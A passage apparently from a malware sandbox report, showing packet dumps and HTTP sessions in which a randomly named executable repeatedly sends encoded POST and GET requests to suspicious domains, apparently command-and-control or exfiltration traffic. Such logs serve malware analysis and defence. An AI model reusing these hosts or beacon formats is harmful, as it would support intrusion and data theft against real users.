                                                                                                      Data Ascii: v ?DF:KWEJjf*pZA-fdr_5aAdG*q e{CiC"o/Vb=8$M+,FDhitpv7zg,S^@ps\LyY"nIZvob{x>b9?=I8pcCn
                                                                                                      Oct 8, 2024 15:56:35.789288044 CEST1236INData Raw: 70 b1 68 5a f8 6c dc 33 ba df 95 d9 0b f5 be 36 16 a7 53 8f aa 05 a9 7d 10 ba 06 db ef f7 1a 07 78 dd b6 97 78 21 f8 59 76 4f 55 3c e7 3c cd 97 3c 29 a5 ce 91 20 c2 3d 37 49 52 51 39 76 dc c8 3f ab 3a e0 39 c4 a4 68 48 3a 0e 52 a9 77 28 9a df 1c
                                                                                                      Data Ascii: phZl36S}xx!YvOU<<<) =7IRQ9v?:9hH:Rw(:KyIjXcI*Xkts?:)IkRB5WQ?d4_H15IB5cJ6L(IyWW`dG"\Y8Iil*2_'d*3S<HQCy9
                                                                                                      Oct 8, 2024 15:56:35.789299011 CEST224INData Raw: 17 54 62 32 80 3b b2 77 3a 55 0d 05 51 55 51 dc aa 61 7e ab 8a f9 ad 1a 16 b7 aa 58 dc aa 61 79 ab 8a e5 ad 1a 56 b7 2a 58 dd 9e 9e d1 99 20 02 96 f9 86 37 78 b8 46 d1 64 32 99 b4 d3 0b 0b 1f d0 49 ff 5c 1e b9 47 30 c2 a4 26 75 6d 1b cc 66 db b9
                                                                                                      Data Ascii: Tb2;w:UQUQa~XayV*X 7xFd2I\G0&umf9[:BG*5KZ&_hvQ%ZIKxvvViV-j>zY`-[VSj<i&Y1^OE~kpo.
                                                                                                      Oct 8, 2024 15:56:35.789336920 CEST1236INData Raw: 7a 0d 4b b6 5e bf 4f a3 39 2b f2 79 c9 45 e0 4b fc 83 6d 16 c5 a7 5b 76 bb 39 6e 58 be 2a 5e 3e 90 e7 74 c9 d6 d0 3a cf 81 b0 f7 fa c4 56 9b c5 b1 e1 ff 66 e9 95 1a 68 00 f5 3e 2e 10 39 35 74 f6 12 fe 90 0d 9e 32 bd fc 8c c2 35 8c 49 42 bd 3e 27
                                                                                                      Data Ascii: zK^O9+yEKm[v9nX*^>t:Vfh>.95t25IB>'mtN&`@l(fbg%@/h-V5Vx^ ^f@V6dT3RG[Q#Noncz\1Z`{'vKHObayu&=2*
                                                                                                      Oct 8, 2024 15:56:35.789371014 CEST1236INData Raw: a2 a7 cc 08 2d 66 4d 85 19 d8 fc 9a 28 d9 57 26 b1 54 3c 8e 6f 05 b9 6c 58 45 80 fc b1 10 31 4f 98 42 63 80 27 c4 4e 49 e7 bb bb e2 35 95 f4 ef 51 04 97 28 73 66 fe e0 45 ac 1c cc 7c 62 91 6e a0 27 2f d7 4e 8b da 36 38 9a 95 c1 dc 0c 61 1a 56 80
                                                                                                      Data Ascii: -fM(W&T<olXE1OBc'NI5Q(sfE|bn'/N68aVI_jl?n9M!dP(GJ5VY^B,DX|MfDv6X;,4\M&.|(3N n)tjg|6!G3e b{'sg01
                                                                                                      Oct 8, 2024 15:56:35.789383888 CEST1236INData Raw: 4f 51 c3 d0 58 68 3e a0 49 25 74 0a 2a 19 bb 0a 4a 39 0b 05 ff c3 02 4e aa ec 89 a8 55 8f 81 bb 85 c2 b5 6d dd 49 b4 e0 1f 97 b3 50 f4 7f 58 44 fd 3c b0 ba 29 b0 35 2e 6f 16 8a be aa bd ab 48 c4 3e c3 98 c8 c1 5b 28 ba 5e 04 11 60 e7 9c 8e 39 2e
                                                                                                      Data Ascii: OQXh>I%t*J9NUmIPXD<)5.oH>[(^`9.xDe:eq-}A]C5BQku,l/x1t-uw!GBCg[qo;`fY(P0H#:]t}N1.-6(W;L
                                                                                                      Oct 8, 2024 15:56:35.789422035 CEST1236INData Raw: 17 70 c0 ed b7 e8 c3 d7 12 28 ea 4b ba 22 8d c4 1f d4 26 7f 27 f0 80 1c f0 2b 78 50 c2 b6 4a c0 a1 ac 63 83 07 ac ab b0 c4 9e d6 55 a0 45 54 d9 9c 92 aa af e0 1a c9 35 14 ea 0b 6e bf 51 ad 68 22 57 18 42 15 a9 14 be 6e 94 08 5c 37 ca e9 09 90 f4
                                                                                                      Data Ascii: p(K"&'+xPJcUET5nQh"WBn\7NkNDa,1M2JrVrGJa=GMEoT!S9 4}g;,1DuX6u9+!`/8Txxq99*q,\d904g
                                                                                                      Oct 8, 2024 15:56:35.789433956 CEST1236INData Raw: 39 78 76 dc 14 b9 78 c8 de 39 e4 ed a1 91 e3 90 e3 87 0a dd a1 1c 10 9a 0f a5 77 a5 83 d0 7d 71 a0 a3 0a e4 b7 6d 7e 1b da 13 82 b1 84 bf a8 c5 9b 43 a9 23 ec 6f fb b2 48 d8 b3 7d 09 25 ec d9 b6 dc 42 1b ba ca f1 68 1f f2 54 5e f1 ed 01 0b c8 94
                                                                                                      Data Ascii: 9xvx9w}qm~C#oH}%BhT^OrgweX%+&NG|d(?tLq-o)}&+|RK97d{7"Ktpg-a};B!l,)t!%YZ+2_rosGrIm
                                                                                                      Oct 8, 2024 15:56:35.789444923 CEST1236INData Raw: ad 7b dd c9 4a a9 d6 37 4e 05 2e 61 50 06 43 1c e0 aa 1a 8b 43 ae fa 92 d5 c9 4b 6d 8b 6d 6f 71 d5 c2 fd 83 af bf fa aa bc db a4 aa 08 b5 44 63 79 39 cb 43 25 70 c5 cf a0 69 a9 6f 70 4b 4c 64 be 0b d5 b7 14 8d 0c 86 c9 e6 f6 ac 42 1a 33 a1 96 12
                                                                                                      Data Ascii: {J7N.aPCCKmmoqDcy9C%piopKLdB3Je@/&(qPP"&8*#LYsSh@/-]AplQvH,5D`@gx(WoB4b|<i1$xQ[RVHOX&3MJk 6y7Jj!
                                                                                                      Oct 8, 2024 15:56:35.794358969 CEST1236INData Raw: 15 59 b3 a5 ad db d1 dc 5e ec 6c ce 96 15 54 c6 45 09 f9 cb ac cc 9f 0e 3b 93 bf 31 35 32 66 76 4e c1 92 03 20 50 93 1a 59 67 1a a1 68 1e 40 b0 93 66 28 95 4e 87 8d 2e c1 58 d4 15 f1 41 04 64 d2 07 d1 3a 2d 6a e2 70 cf 4b 4f 3b d4 fd ab bc 1a 28
                                                                                                      Data Ascii: Y^lTE;152fvN PYgh@f(N.XAd:-jpKO;(gRAuB^s'/4}4G?c\G(uftKPjN{E=|pF!l&)\9$"8_~V"HpcI,JOME99iNsb9XA


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      24192.168.2.1150005103.21.221.4803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:56:37.154119015 CEST470OUTGET /abla/?gP=R9BPGtjeoV0CDxCBeHwugo2BsPFWgaNdCqs+EeARQOkoA/Qwpt/BQ4HKq3lGg5eAXthSBpGiRyb49E6pfVOIP+nYbA/MCobApDN+18WI9d8e3Vo/1w2CbZc=&-L=kBMxZFRpAD6P HTTP/1.1
                                                                                                      Host: www.tempatmudisini01.click
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Oct 8, 2024 15:56:38.338138103 CEST525INHTTP/1.1 301 Moved Permanently
                                                                                                      Connection: close
                                                                                                      x-powered-by: PHP/7.4.33
                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                      x-redirect-by: WordPress
                                                                                                      location: http://tempatmudisini01.click/abla/?gP=R9BPGtjeoV0CDxCBeHwugo2BsPFWgaNdCqs+EeARQOkoA/Qwpt/BQ4HKq3lGg5eAXthSBpGiRyb49E6pfVOIP+nYbA/MCobApDN+18WI9d8e3Vo/1w2CbZc=&-L=kBMxZFRpAD6P
                                                                                                      x-litespeed-cache: miss
                                                                                                      content-length: 0
                                                                                                      date: Tue, 08 Oct 2024 13:56:38 GMT
                                                                                                      server: LiteSpeed


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      25192.168.2.11500063.33.130.190803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:56:43.394007921 CEST718OUTPOST /xweg/ HTTP/1.1
                                                                                                      Host: www.o731lh.vip
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 199
                                                                                                      Origin: http://www.o731lh.vip
                                                                                                      Referer: http://www.o731lh.vip/xweg/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 2b 77 75 41 44 37 4d 73 48 43 35 63 6c 53 6c 6d 61 65 32 57 37 49 64 2f 61 76 50 34 2b 64 6f 63 57 52 39 78 6d 7a 2b 6f 75 35 58 58 6e 36 4a 6a 4d 73 62 68 5a 41 45 46 4b 64 2f 34 74 2f 54 75 75 67 61 6c 64 77 31 5a 6a 71 4c 2f 54 67 71 4b 4b 51 4a 76 59 39 45 34 36 41 36 6c 67 55 38 37 75 48 50 44 77 38 2b 70 63 6f 68 49 43 69 78 54 32 61 50 52 76 41 53 47 47 54 6f 62 61 44 77 7a 4c 64 6f 78 57 64 64 5a 66 53 6e 37 78 30 2b 4b 59 33 44 47 33 53 2f 62 37 67 47 56 72 48 43 68 6f 43 52 6e 71 61 59 33 38 36 4b 52 75 67 5a 37 65 4a 55 51 6b 50 78 73 4f 49 41 54 30 37 38 35 65 41 3d 3d
                                                                                                      Data Ascii: gP=+wuAD7MsHC5clSlmae2W7Id/avP4+docWR9xmz+ou5XXn6JjMsbhZAEFKd/4t/Tuugaldw1ZjqL/TgqKKQJvY9E46A6lgU87uHPDw8+pcohICixT2aPRvASGGTobaDwzLdoxWddZfSn7x0+KY3DG3S/b7gGVrHChoCRnqaY386KRugZ7eJUQkPxsOIAT0785eA==


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      26192.168.2.11500073.33.130.190803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:56:45.958532095 CEST738OUTPOST /xweg/ HTTP/1.1
                                                                                                      Host: www.o731lh.vip
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 219
                                                                                                      Origin: http://www.o731lh.vip
                                                                                                      Referer: http://www.o731lh.vip/xweg/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 2b 77 75 41 44 37 4d 73 48 43 35 63 6b 7a 56 6d 5a 39 75 57 73 34 64 34 47 2f 50 34 33 39 70 56 57 52 68 78 6d 79 72 74 75 4b 7a 58 6e 66 74 6a 4e 74 62 68 4a 51 45 46 54 74 2f 39 77 50 54 54 75 67 57 62 64 79 52 5a 6a 71 50 2f 54 6b 75 4b 4c 6e 39 73 5a 74 45 41 32 67 36 6e 39 45 38 37 75 48 50 44 77 38 71 50 63 72 52 49 44 53 68 54 77 2f 6a 57 6d 67 53 5a 57 44 6f 62 4d 7a 78 36 4c 64 6f 54 57 63 42 7a 66 52 66 37 78 77 36 4b 57 46 72 48 38 53 2f 52 6d 77 48 4e 71 55 37 54 6a 7a 49 57 71 37 6f 6b 30 71 53 46 69 47 49 68 4f 71 64 48 6e 63 35 75 61 75 68 6a 39 4b 5a 77 46 4b 54 32 6b 4d 2b 6a 43 75 76 61 39 4b 70 4d 6a 61 6f 66 44 50 73 3d
                                                                                                      Data Ascii: gP=+wuAD7MsHC5ckzVmZ9uWs4d4G/P439pVWRhxmyrtuKzXnftjNtbhJQEFTt/9wPTTugWbdyRZjqP/TkuKLn9sZtEA2g6n9E87uHPDw8qPcrRIDShTw/jWmgSZWDobMzx6LdoTWcBzfRf7xw6KWFrH8S/RmwHNqU7TjzIWq7ok0qSFiGIhOqdHnc5uauhj9KZwFKT2kM+jCuva9KpMjaofDPs=


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      27192.168.2.11500083.33.130.190803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:56:48.516735077 CEST1751OUTPOST /xweg/ HTTP/1.1
                                                                                                      Host: www.o731lh.vip
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 1231
                                                                                                      Origin: http://www.o731lh.vip
                                                                                                      Referer: http://www.o731lh.vip/xweg/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 2b 77 75 41 44 37 4d 73 48 43 35 63 6b 7a 56 6d 5a 39 75 57 73 34 64 34 47 2f 50 34 33 39 70 56 57 52 68 78 6d 79 72 74 75 4b 37 58 6d 70 78 6a 50 4f 7a 68 4b 51 45 46 4d 64 2f 38 77 50 54 43 75 67 65 66 64 79 64 76 6a 73 54 2f 54 48 6d 4b 44 79 52 73 54 74 45 41 2b 41 36 6b 67 55 39 76 75 48 66 66 77 38 36 50 63 72 52 49 44 58 6c 54 77 71 50 57 71 41 53 47 47 54 70 4a 61 44 77 66 4c 64 77 70 57 63 46 4a 66 67 2f 37 77 51 71 4b 55 32 44 48 2f 79 2f 66 6e 77 48 65 71 56 48 49 6a 7a 6c 70 71 37 64 44 30 6f 43 46 7a 77 56 46 52 5a 35 37 36 74 64 45 45 73 56 6c 67 34 4a 31 4e 61 54 43 75 2b 57 32 61 35 6e 54 32 49 6f 37 78 61 49 75 64 76 44 45 57 71 6f 33 68 54 56 54 70 64 45 5a 73 48 63 2b 38 53 32 57 51 43 39 54 50 41 77 39 51 45 30 48 71 6b 2f 4f 4f 57 2f 35 4c 33 50 6f 43 30 4f 41 4e 5a 34 4c 2f 50 55 6a 45 6e 37 2f 72 4a 48 52 57 65 43 49 76 4a 33 4d 56 43 38 58 58 71 66 47 75 67 4c 6f 56 4c 4e 67 68 55 72 76 66 4e 44 53 43 32 58 6d 51 32 70 73 35 73 6b 75 30 2f 4e 65 77 6b 31 75 77 75 2b [TRUNCATED]
                                                                                                      Data Ascii: gP=+wuAD7MsHC5ckzVmZ9uWs4d4G/P439pVWRhxmyrtuK7XmpxjPOzhKQEFMd/8wPTCugefdydvjsT/THmKDyRsTtEA+A6kgU9vuHffw86PcrRIDXlTwqPWqASGGTpJaDwfLdwpWcFJfg/7wQqKU2DH/y/fnwHeqVHIjzlpq7dD0oCFzwVFRZ576tdEEsVlg4J1NaTCu+W2a5nT2Io7xaIudvDEWqo3hTVTpdEZsHc+8S2WQC9TPAw9QE0Hqk/OOW/5L3PoC0OANZ4L/PUjEn7/rJHRWeCIvJ3MVC8XXqfGugLoVLNghUrvfNDSC2XmQ2ps5sku0/Newk1uwu+mL/qVW5iCgVWhFNXshhQ0kL3Guo3+SAOFPWimTO86+LVEwc0kfVORL4lU1IlJjwfBdTvYlyngxVmG3vgBXHDs4mPdr9b6voJtBUpRvFYCWxoN7qvJi6T893CuRnwHQUaXDJqR61QdWumIcsMjIlCJ7zVQMIrvWReBPkHZDWdosYdIgS57h8LE8QjnL1bNLmrxgdMJBsgHuxI253PYECmZqyb/B0P+Xk1ELLKdo3ScxWgUJPljR402mxwYWPsQgR6iv1r3AW8gWMIbRSgv/TlcmFI/K4xqBc8yZj9yz2cxnxzQvfFSUIUeOcABhZtLzl7C46BGOBtMoIYsDY1AH9Jle0PAP19PkbN0+3CGEhqvJn1SWENb9D8bCsue3benX8ZcnsUiHLmaxIS/gInKyUC2a7x8xmRGa4Dy24wZMVrtX5+4HgRPAPR2Ve3YWFHAWLd/1+gY1vgpDvtCG8TIy6lh2zpw/hoQUkXfUizpp7JKWeB6FbyfUy9+llazNIwq+N3mITTn0FNqtk00k/LalKtBGp7qg6zdcoAXzoxloCefRm4sr47KLLL5V4HzJio/QjvQ6H+BZD2TPoSdyC7p18+Fxqm8kAR1oWerjLIOVmQUoQbSoiUgbfaO3KI5PQWRTDWEcTzuxDJlbqHpozC+7iaC6LX80sSVKSKQj [TRUNCATED]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      28192.168.2.11500093.33.130.190803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:56:51.051431894 CEST458OUTGET /xweg/?-L=kBMxZFRpAD6P&gP=zyGgAOIUWHAkjy53XOab1MtcQdyBzOoJaxZIhC+JlO6DnbZYVfn3Wlg6Cuq4vonK+0ubeBxTnsDOaX+bBTk8d8gi4CXplyUvpH+a6MWSZKg7Sn8a+cnOgQs= HTTP/1.1
                                                                                                      Host: www.o731lh.vip
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Oct 8, 2024 15:56:51.500041008 CEST394INHTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Tue, 08 Oct 2024 13:56:51 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 254
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 2d 4c 3d 6b 42 4d 78 5a 46 52 70 41 44 36 50 26 67 50 3d 7a 79 47 67 41 4f 49 55 57 48 41 6b 6a 79 35 33 58 4f 61 62 31 4d 74 63 51 64 79 42 7a 4f 6f 4a 61 78 5a 49 68 43 2b 4a 6c 4f 36 44 6e 62 5a 59 56 66 6e 33 57 6c 67 36 43 75 71 34 76 6f 6e 4b 2b 30 75 62 65 42 78 54 6e 73 44 4f 61 58 2b 62 42 54 6b 38 64 38 67 69 34 43 58 70 6c 79 55 76 70 48 2b 61 36 4d 57 53 5a 4b 67 37 53 6e 38 61 2b 63 6e 4f 67 51 73 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?-L=kBMxZFRpAD6P&gP=zyGgAOIUWHAkjy53XOab1MtcQdyBzOoJaxZIhC+JlO6DnbZYVfn3Wlg6Cuq4vonK+0ubeBxTnsDOaX+bBTk8d8gi4CXplyUvpH+a6MWSZKg7Sn8a+cnOgQs="}</script></head></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      29192.168.2.11500103.33.130.190803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:56:56.568715096 CEST751OUTPOST /2ho9/ HTTP/1.1
                                                                                                      Host: www.consultarfacil.online
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 199
                                                                                                      Origin: http://www.consultarfacil.online
                                                                                                      Referer: http://www.consultarfacil.online/2ho9/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 68 62 72 49 68 52 55 6e 4b 58 70 46 47 39 73 50 4c 54 63 62 52 65 43 52 79 6d 37 37 70 51 30 65 33 79 2b 6e 6e 4f 37 5a 6f 75 63 70 42 75 69 68 32 53 36 5a 56 77 4c 32 6a 54 30 6c 65 5a 2b 76 4f 33 37 36 62 6e 44 50 34 77 68 6d 62 4b 32 2f 7a 35 37 4c 44 61 61 79 4a 61 78 62 48 66 67 61 67 76 6d 38 4a 77 61 67 77 55 34 36 67 61 31 73 64 68 63 38 7a 36 62 7a 59 4c 47 39 74 33 6a 41 51 64 56 46 31 6d 44 75 7a 62 4c 72 45 61 71 41 74 6d 4a 64 77 75 4d 39 6e 49 64 6b 33 56 4c 6d 33 6f 39 38 30 7a 47 70 36 76 78 75 38 4a 72 62 48 4f 76 62 4f 41 49 53 6f 74 59 68 64 45 51 49 2b 67 3d 3d
                                                                                                      Data Ascii: gP=hbrIhRUnKXpFG9sPLTcbReCRym77pQ0e3y+nnO7ZoucpBuih2S6ZVwL2jT0leZ+vO376bnDP4whmbK2/z57LDaayJaxbHfgagvm8JwagwU46ga1sdhc8z6bzYLG9t3jAQdVF1mDuzbLrEaqAtmJdwuM9nIdk3VLm3o980zGp6vxu8JrbHOvbOAISotYhdEQI+g==


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      30192.168.2.11500113.33.130.190803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:56:59.118426085 CEST771OUTPOST /2ho9/ HTTP/1.1
                                                                                                      Host: www.consultarfacil.online
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 219
                                                                                                      Origin: http://www.consultarfacil.online
                                                                                                      Referer: http://www.consultarfacil.online/2ho9/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 68 62 72 49 68 52 55 6e 4b 58 70 46 48 64 63 50 4b 30 49 62 58 2b 43 4f 75 57 37 37 67 77 30 61 33 79 69 6e 6e 4c 62 4a 72 61 77 70 42 50 53 68 6b 54 36 5a 55 77 4c 32 6b 6a 30 6b 42 4a 2b 6d 4f 33 6d 4a 62 6a 4c 50 34 77 31 6d 62 4b 47 2f 7a 71 6a 49 44 4b 61 4b 42 36 78 46 4b 2f 67 61 67 76 6d 38 4a 30 32 47 77 55 77 36 68 71 6c 73 63 46 77 2f 2b 61 62 30 51 72 47 39 6d 58 69 4c 51 64 55 69 31 69 69 44 7a 5a 44 72 45 59 43 41 74 33 4a 53 6e 2b 4d 37 70 6f 63 68 6d 6d 32 6a 35 2f 38 6f 73 69 79 49 74 72 38 4b 39 50 36 42 58 74 6d 4d 4e 54 41 51 38 4c 35 52 55 31 31 42 6c 68 59 33 2f 2f 72 78 58 44 6d 4f 57 53 63 35 75 77 67 35 5a 4e 49 3d
                                                                                                      Data Ascii: gP=hbrIhRUnKXpFHdcPK0IbX+COuW77gw0a3yinnLbJrawpBPShkT6ZUwL2kj0kBJ+mO3mJbjLP4w1mbKG/zqjIDKaKB6xFK/gagvm8J02GwUw6hqlscFw/+ab0QrG9mXiLQdUi1iiDzZDrEYCAt3JSn+M7pochmm2j5/8osiyItr8K9P6BXtmMNTAQ8L5RU11BlhY3//rxXDmOWSc5uwg5ZNI=


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      31192.168.2.11500123.33.130.190803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:57:01.773335934 CEST1784OUTPOST /2ho9/ HTTP/1.1
                                                                                                      Host: www.consultarfacil.online
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 1231
                                                                                                      Origin: http://www.consultarfacil.online
                                                                                                      Referer: http://www.consultarfacil.online/2ho9/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 68 62 72 49 68 52 55 6e 4b 58 70 46 48 64 63 50 4b 30 49 62 58 2b 43 4f 75 57 37 37 67 77 30 61 33 79 69 6e 6e 4c 62 4a 72 62 6b 70 42 38 61 68 6e 77 53 5a 4f 77 4c 32 72 7a 30 70 42 4a 2f 30 4f 33 2b 57 62 6a 48 31 34 7a 4e 6d 62 72 6d 2f 6e 50 58 49 49 4b 61 4b 65 71 78 59 48 66 67 31 67 72 4c 33 4a 77 57 47 77 55 77 36 68 73 5a 73 49 68 63 2f 38 61 62 7a 59 4c 47 35 74 33 69 6a 51 64 4e 64 31 6a 6a 2b 79 70 6a 72 46 34 53 41 73 46 68 53 6b 65 4d 35 75 6f 63 48 6d 6d 36 6f 35 2f 49 6b 73 69 48 56 74 73 34 4b 39 72 48 57 4d 65 62 57 59 41 77 38 70 4e 68 78 59 6d 46 2f 70 69 63 32 2f 61 6a 4d 4a 45 71 55 62 33 6c 4b 34 30 63 52 61 70 70 67 31 50 79 73 31 42 66 33 34 45 62 37 75 66 78 39 50 54 55 39 44 39 54 36 57 72 63 61 74 42 71 71 4a 35 6e 42 4f 54 57 63 4f 55 61 78 39 4d 37 5a 70 69 4c 41 39 69 79 38 6f 42 34 55 73 76 67 43 74 62 4d 56 62 6f 46 4a 48 32 4a 6a 34 5a 70 2f 45 73 46 79 6b 49 76 64 35 77 2f 77 33 65 5a 2f 4e 30 56 67 47 68 51 7a 38 36 68 2b 53 4b 46 77 38 35 49 7a 50 65 6d [TRUNCATED]
